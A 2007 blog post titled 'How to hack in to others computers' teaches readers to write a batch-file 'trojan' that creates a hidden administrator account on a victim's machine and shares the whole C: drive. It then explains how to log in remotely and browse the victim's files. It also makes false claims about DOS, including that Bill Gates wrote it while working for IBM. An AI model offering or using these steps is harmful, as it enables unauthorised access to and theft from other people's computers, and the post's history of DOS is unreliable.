since I pretty much enjoy the old ways of hacking: DOS, I thought I would share some of my knowledge to you about DOS hacking. Although, this technique is pretty much out-dated, it may still work on some computers and is worth the read. smile.gif
Okay, before we started, let me explain to you what DOS is and what it can do.
[HIDE-REPLY]What is DOS and what can it do?
Disk Operating System AKA DOS is a command line operating system that Windows runs on top of. It was first created and compiled by Bill Gates while working for IBM. DOS can run various types of command that communicates with your PC and Internet such as CD, Dir, Ren, Copy, Ping, Netsend, Netstat, and so forth.
Getting Started
1. Openining DOS Prompt: Go to start; Click on Run; Type in cmd; Press Ok
2. Opening Notepad: Go to start; Click on Program File; Click on Accessories; Click on Notepad.
Writing The Trojan
First, we are going to create an Admin account on victim's computer, so that we can access to all files. By doing so, we add "net user name /add" into the Notepad. The user account has been created, but we need to it an admin account. By doing so, we add "net localgroup "Administrators" /add name" into the Notepad under the 1st line of command. So far, we have managed to create an admin account on victim's account! But we are not there yet. We need to set a command so that we gain access to the files as well. By doing so, we add "net share system=C: /unlimited" into the Notepad under the 2nd line of command. Now, we need to save the code as a .bat file. Bingo! You just made your first trojan in batch! Pretty easy, huh?
Getting Inside
Now the real fun begins. smile.gif Go to DOS Prompt, and type in "net use victimip name." This command logs you in as an admin on the victim's computer. After being logged in, you pretty much can do what you want. smile.gif For starters, you could browse his harddrive by typing "explorer victimipsystem," and after doing so, it will open a windows explorer starting on his C: Drive.
Friday, December 7, 2007
How to hack in to others computers
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment